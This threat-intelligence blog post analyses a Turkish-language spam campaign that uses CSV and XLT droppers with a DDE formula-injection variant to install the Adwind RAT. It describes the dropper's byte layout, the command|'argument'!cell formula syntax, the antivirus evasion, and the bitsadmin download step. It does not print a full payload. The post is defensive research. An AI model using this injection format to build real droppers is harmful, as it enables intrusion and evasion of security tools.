Introduction Cisco Talos, along with fellow cybersecurity firm ReversingLabs, recently discovered a new spam campaign that is spreading the Adwind 3.0 remote access tool (RAT), targeting the three major desktop operating systems (Linux, Windows and Mac OSX). This new campaign, first discovered by ReversingLabs on Sept. 10, appears to be a variant of the Dynamic Data Exchange (DDE) code injection attack on Microsoft Excel that has appeared in the wild in the past. This time, the variant is able to avoid detection by malware-blocking software. ReversingLabs has written their own blog on this issue here.
The majority of the targets in this campaign are in Turkey, according to data from the Cisco Umbrella cloud security platform. After our research, we have discovered important details about this attack, as well as the malicious, forged Microsoft Office documents that the attackers are using.
Spam campaign Our Umbrella telemetry shows that this campaign started on Aug. 26, 2018, peaking on Aug. 28.
DNS query hits Umbrella also shows that 75 percent of the requests were made from Turkey. This is no surprise, considering the language in the spam emails is Turkish. Some of the targets were also located in Germany, which makes sense given that there is a significant Turkish community in Germany. The attackers tempt the user with an email about the cost of footwear in this particular example below.
Sample of spam email In the screenshot above, we can see a CSV file is attached. We identified attachments with the .XLT extension, too — please see the "Microsoft Office Dropper" section for additional details.
Microsoft Office Dropper We have seen at least two different droppers in this campaign. They use either the .csv or .xlt extensions, which are opened by default by Microsoft Excel. Both versions were leveraging a new variant to the DDE code injection attack. Although this method is well-known, this variant is undetected at the time of this writing.
The dropper implementing this method will have the following internal format:
<random quantity of data><special byte><code to be executed><random quantity of data>
Here is a breakdown of what this format means:
<random quantity of data> — Random data in any quantity — the last is optional. Not necessarily ASCII characters.
<special byte> — 0x0A (New Line) or 0x0D (Carriage Return), these special bytes are interpreted by Excel as new lines, putting any data that follows on the first cell of the next row.
<code to be executed> — the executed command must start by "=", "+", "-" or be included in a function (such as @SUM()). The command format is command|'argument'!cell. The cell does not need to be a valid one. For example:
The dropper file can have any of the extensions in the table below. Not all of the extensions will be opened by Microsoft Excel by default. However, for the non-default extensions, a script starting Excel with a file with one of these extensions as a parameter is still a viable attack scenario.
Formats like CSV doesn't have a predefined header, thus it can contain any kind of data at the beginning. Having random data like in the samples we found my trick the anti-virus into skip the file scanning. Other formats may be considered corrupted, as they might not follow the expected format.
Example of a dropper Excel will display warnings to the user regarding the execution of code. Here is an example where the payload is executing "calc.exe:"
Excel corruption warning upon execution As you can see, Excel detects that the opened file is not a real XLT document. It explains that the file is probably corrupted and asks the user if they are sure they want to open it.
Command execution warning The second warning notifies the user that the document will execute the application "CMD.exe."
Calc execution If the user accepts the three warnings, the system will open the calculator application.
In this campaign, the purpose of the injected code was to create and execute a VBScript with the following content:
The script uses bitasdmin, a tool provided by Microsoft to download or upload jobs and monitor their progress, to get the final payload. This payload is a Java archive file.
Java Payload The Java code is packed with the demo version of a commercial packer named "Allatori Obfuscator version 4.7."
Packer banner We identified the packed malware as Adwind RAT v3.0.
Adwind configuration It's a well-known multiplatform RAT with several configurations possible. The samples we tested were configured to achieve persistence on Windows, Linux and Mac OSX. Each platform has its own persistence name (see IOC section).
This RAT is used by several malicious groups. It gives its operators the ability to execute any kind of commands on its victims, log keystroke, take screenshots, take pictures or transfer files. In the past, it has been used to run cryptocurrency mining campaigns and in a separate attack that targeted the aviation industry.
Conclusion The DDE variant used by the droppers in this campaign is a good example of how signature-based antivirus software can be tricked. It is also a warning sign regarding file extension-scanning configurations. This kind of injection has been known for years, however, this actor found a way to modify it in order to have an extremely low detection ratio. The malicious actor used a well-known multiplatform RAT with a wide range of capabilities — a "field proven" RAT that ensured it would work as designed and go undetected. Although both the generic method and the payload are known, this campaign shows how some variance in well-known artifacts can trick antivirus software. Their behavior, however, is clearly classical, which means that sandboxing- and behavior-based solutions aligned with intent-based networks should be able to detect and stop these threats without problems.
Coverage
Additional ways our customers can detect and block this threat are listed below.
(AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.
Email Security can block malicious emails sent by threat actors as part of their campaign.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
